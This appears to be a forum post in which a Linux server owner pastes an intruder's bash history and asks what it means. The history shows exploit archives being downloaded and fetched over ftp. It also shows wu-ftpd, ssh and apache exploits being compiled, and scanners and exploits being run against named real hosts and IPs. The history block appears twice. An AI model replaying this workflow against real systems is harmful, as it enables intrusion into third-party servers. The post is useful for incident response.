HACKER caught red handed on my linux box..

2025-03-31

CAN SOMEONE TELL ME WHAT THIS GUY IS DOING ON MY LINUX BOX??? IT LOOKS HIGHLY SUSPICIOUS.. I was in linux shell doing my daily chores when I decided to run the command "w".. I saw 4 instances of an account being logged in so I looked at his bash and I think he's hacking..... Try to dipher what he's doing...

With all this suspicious activity going on, I looked at his BASH and there was all these files like EXPLOIT, HACKS, etc being downloaded.. So as he was continuing all of this, I decided to broadcast a message server wide...This is the msg I broadcast..

Broadcast message from root:
We monitor all suspicious activity.

As soon as I did that, he just stopped everything.. from all 4 connections.. I just saw "-bash" and nothing else.. Afterwards, he just logged off..

HIS WHOLE BASH_HISTORY....

./ft www.namkang.co.kr
PuTTY www.namkang.co.kr
ls -la
./sco lia.ac.id
ls -la
nslookup uph.edu
nslookup www.uph.edu
nslookup www.uph.edu
pico locale.c
gcc -o locale locale.c
ls -la
gcc -o lo locale.c
pico locale.c
pico locale.c
gcc -o lo locale.c
pico locale.c
gcc -o lo locale.c
ico alpd
pico alpd.c
gcc -o alpd.c alp
gcc -o alp alpd.c
ls -la
alpd
./alpd
alp
./alp
alp 24.1
./alp 24.1
./alp 202.53.225.133
./alp a
./alp 202.53
ls -la
rm id.log
telnet www.faithradio.com
209.207.253.67./ft
ls -la
./ft
PuTTY
./su
./wu
./wu -h
./wu -t 209.207.253.67
pico ani.c
gcc -o ani ani.c
./ani
./ani www.faithradio.com
ls -la
./ani www.faithradio.com
id
./tembak 202.152.37.58 53
./tembak 65.168.52.33 53
./tembak 65.168.52.33 53 |w
cd domba
ls -la
./btx www.richardpaul.com
./btx www.reseparkera.nu
./btx bsd1.golffans.com
./btx faithradio.com
./btx www.faithradio.com
./btx oficinas.socoada.com.mx
./sco oficinas.socoada.com.mx
./sco www.mdlawnet.com
./sco www.lighthouse-studios.com
ftp thugscript.net
ls -la
./apache
./apache
chmod +x apache
ls -la
./apache
./apache 130.94.172.9
./apache 130.94.172.9
chmod +x wu
./wu
try -h
-h
./wu -h
./wu id >> id.log
./wu 130.94.172.9
./wu -t 130.94.172.9
./wu -tl 130.94.172.9 sukses
./wu -t 130.94.172.9
(./wu -p 2 -d 0xff4 ; cat
ls -la
]
/wu -p 2 -d 0xff4 ; cat
./wu -p 2 -d 0xff4 ; cat
pico c.c
gcc -o c c.c -lrpcsvc -lnsl -lsocket
ls -la
./wu
./wu -t 165.34.678
pico tembak.c
gcc -o tembak tembak.c
./tembak
./tembak 202.53.225.133 53
./tembak 65.168.52.33 53
LS -LA
ls -la
cd domba
ls -la
pico sco.c
gcc -o sco sco.c
ls -la
./sco www.k-times.com
./sco oficinas.socoada.com.mx
./sco oficinas.socoada.com.mx
./sco oficinas.socoada.com.mx
./sco oficinas.socoada.com.mx
./sco www.gtaaaco.org
./sco sigma.cav.udesc.br
./sco ptsb.plateau.com.my
./sco mail.comab.com.br
./sco mail.comab.com.br
./sco unix.harrisondigital.com
./sco sail.nic.in
./sco www.shayne.com.tw
./sco www.mvp.gov.ba
cd domba
ls -la
cd Linux
ls -la
lynx http://packetstormsecurity.org/0012-...50wu-v5.tar.gz
ls -la
tar -zxvf 7350wu-v5.tar.gz
ls -la
cd
cd 7350wu
cd 7350wu
ls -la
cd domba
cd Linux
cd 7350wu
ls -la
pwd
cp 7350wu.c /home/ihcrew/domba/Linux/
cd ..
ls -la
cd vetescan
ls -la
cp z0ne /home/ihcrew/domba/Linux/
cd ..
pwd
ls -la
./zone tw -o >> tw.log
./z0ne tw -o >> tw.log
cd ..
W
w
ps aux
ftp thugscript.net
ls
ls -la
cd domba
ls -la
pico us.pl
ls -la
chmod +x us.pl
/perl us.pl handbag.com
./perl us.pl handbag.com
./us.pl handbag.com
ls -la
mkdir bsd
cp bsd.c msd
cp bsd.c bsd
ls -la
rm *.c
ls -la
mkdir unix
pico sco.c
ls -la
mkdir ssh
cd ssh
lynx http://www.rootshell.be/~revolt/expl...ssh-1.6.tar.gz
ls -la
lynx http://www.rootshell.be/~revolt/expl...ssh-1.6.tar.gz
ls -la
tar -zxvf scanssh-1.6.tar.gz
ls -la
cd scanssh
ls -la
gcc -o scanssh scanssh.c
ls -la
cd CVS
ls -la
./Root
chmod +x Root
ls -la
./Root
ls -la
cd ..
ls -la
cd missing
ls -la
cd .
ls -la
ls -la
cd ..
ls -la
cd ..
lynx http://www.rootshell.be/~revolt/expl...ssh-crc.tar.gz
tar -zxvf ssh-crc.tar.gz
ls -la
mv ssh-crc sshc
ls -la
cd sshc
ls -la
cat readme.txt
ls -la
gcc -o xp xpl.c
chmod+x xp
chmod +x xp
./xp 30988 0 114200 117280 127.0.0.1 22 3
ls -la
cd ..
cd ..
ls -la
mkdir Linux
cd Linux
pico apache.c
pico apache.c
gcc -o apac apache.c
chmod +x apac
./apac
pwd
lynx
lyns http://packetstormsecurity.org/UNIX/...2-26-99.tar.gz
lynx http://packetstormsecurity.org/UNIX/...2-26-99.tar.gz
ls -la
tar -zxvf VeteScan-12-26-99.tar.gz
ls -la
cd vetescan
ls -la
./z0ne il -o >> il.log
ls -la
cat il.log
cp il.log /home/ihcrew/domba/Linux/
cd ..
ls -la
gcc -o 73 7350wu.c
ls -la
cd 7350wu.c
cd 7350wu
ls -la
cp network.h /home/ihcrew/domba/Linux/
cd ..
ls -la
gcc -o 73 7350wu.c
ls -la
cd 7350wu
ls -la
./make
make
ls -la
cd vetescan
cp 7350wu /home/ihcrew/domba/Linux/
cd ..
ls -la
rm 7350wu.c
cd 7350wu
ls -la
mv 7350wu 73
ls -la
cp 73 /home/ihcrew/domba/Linux/
cd ..
ls -la
pico wu-scan.c
gcc -o wu wu-scan.c
ls -la
./wu-scan il.log
./wu-scan il.log ./wu-scan il.log
cat wu-scan.log | grep vulnerable./wu i
./wu il.log
ls -la
cat wu-scan.log | grep vulnerable
cat wu-scan.log
./73 -t -h 132.66.32.10
cd 7350wu
ls -la
gcc -o net network.c
ls -la
ls -la
cd ..
ls -la
pico wuftpd2600.c
ls -la
gcc -o wuftp wuftpd2600.c
ls -la
lynx http://packetstormsecurity.org/Explo...-sploit.tar.gz
ls -la
tar -zxvf wuftpd-sploit.tar.gz
ls
cd wuftpd-sploit
ls -la
makefile
make
./make
pwd
cp wuftpd /home/ihcrew/domba/Linux/
cd ..
cd Linux
ls -la
cat wu-scan.log
./wuftpd 132.66.32.10
./wuftpd -t -p -u -f 132.66.32.10
cd 132.66.32.10
cd wuftpd-sploit
ls -la
gcc -o port port.c
ls -la
cd ..
pico wuf.c
ls -la
gcc -o wuf wuf.c
ls -la
rm wuftpd2600.c
rm wuf.c
pico wuftp.c
W
w
ps aux
ftp thugscript.net
ls
ls -la
cd domba
ls -la
pico us.pl
ls -la
chmod +x us.pl
/perl us.pl handbag.com
./perl us.pl handbag.com
./us.pl handbag.com
ls -la
mkdir bsd
cp bsd.c msd
cp bsd.c bsd
ls -la
rm *.c
ls -la
mkdir unix
pico sco.c
ls -la
mkdir ssh
cd ssh
lynx http://www.rootshell.be/~revolt/expl...ssh-1.6.tar.gz
ls -la
lynx http://www.rootshell.be/~revolt/expl...ssh-1.6.tar.gz
ls -la
tar -zxvf scanssh-1.6.tar.gz
ls -la
cd scanssh
ls -la
gcc -o scanssh scanssh.c
ls -la
cd CVS
ls -la
./Root
chmod +x Root
ls -la
./Root
ls -la
cd ..
ls -la
cd missing
ls -la
cd .
ls -la
ls -la
cd ..
ls -la
cd ..
lynx http://www.rootshell.be/~revolt/expl...ssh-crc.tar.gz
tar -zxvf ssh-crc.tar.gz
ls -la
mv ssh-crc sshc
ls -la
cd sshc
ls -la
cat readme.txt
ls -la
gcc -o xp xpl.c
chmod+x xp
chmod +x xp
./xp 30988 0 114200 117280 127.0.0.1 22 3
ls -la
cd ..
cd ..
ls -la
mkdir Linux
cd Linux
pico apache.c
pico apache.c
gcc -o apac apache.c
chmod +x apac
./apac
pwd
lynx
lyns http://packetstormsecurity.org/UNIX/...2-26-99.tar.gz
lynx http://packetstormsecurity.org/UNIX/...2-26-99.tar.gz
ls -la
tar -zxvf VeteScan-12-26-99.tar.gz
ls -la
cd vetescan
ls -la
./z0ne il -o >> il.log
ls -la
cat il.log
cp il.log /home/ihcrew/domba/Linux/
cd ..
ls -la
gcc -o 73 7350wu.c
ls -la
cd 7350wu.c
cd 7350wu
ls -la
cp network.h /home/ihcrew/domba/Linux/
cd ..
ls -la
gcc -o 73 7350wu.c
ls -la
cd 7350wu
ls -la
./make
make
ls -la
cd vetescan
cp 7350wu /home/ihcrew/domba/Linux/
cd ..
ls -la
rm 7350wu.c
cd 7350wu
ls -la
mv 7350wu 73
ls -la
cp 73 /home/ihcrew/domba/Linux/
cd ..
ls -la
pico wu-scan.c
gcc -o wu wu-scan.c
ls -la
./wu-scan il.log
./wu-scan il.log ./wu-scan il.log
cat wu-scan.log | grep vulnerable./wu i
./wu il.log
ls -la
cat wu-scan.log | grep vulnerable
cat wu-scan.log
./73 -t -h 132.66.32.10
cd 7350wu
ls -la
gcc -o net network.c
ls -la
ls -la
cd ..
ls -la
pico wuftpd2600.c
ls -la
gcc -o wuftp wuftpd2600.c
ls -la
lynx http://packetstormsecurity.org/Explo...-sploit.tar.gz
ls -la
tar -zxvf wuftpd-sploit.tar.gz
ls
cd wuftpd-sploit
ls -la
makefile
make
./make
pwd
cp wuftpd /home/ihcrew/domba/Linux/
cd ..
cd Linux
ls -la
cat wu-scan.log
./wuftpd 132.66.32.10
./wuftpd -t -p -u -f 132.66.32.10
cd 132.66.32.10
cd wuftpd-sploit
ls -la
gcc -o port port.c
ls -la
cd ..
pico wuf.c
ls -la
gcc -o wuf wuf.c
ls -la
rm wuftpd2600.c
rm wuf.c
pico wuftp.c

----

This is where he received the broadcast message and a few mins later was idle, then after 5mins he loggd off all 4 connections.. all different IP addresses..

HACKER caught red handed on my linux box..

HACKER caught red handed on my linux box..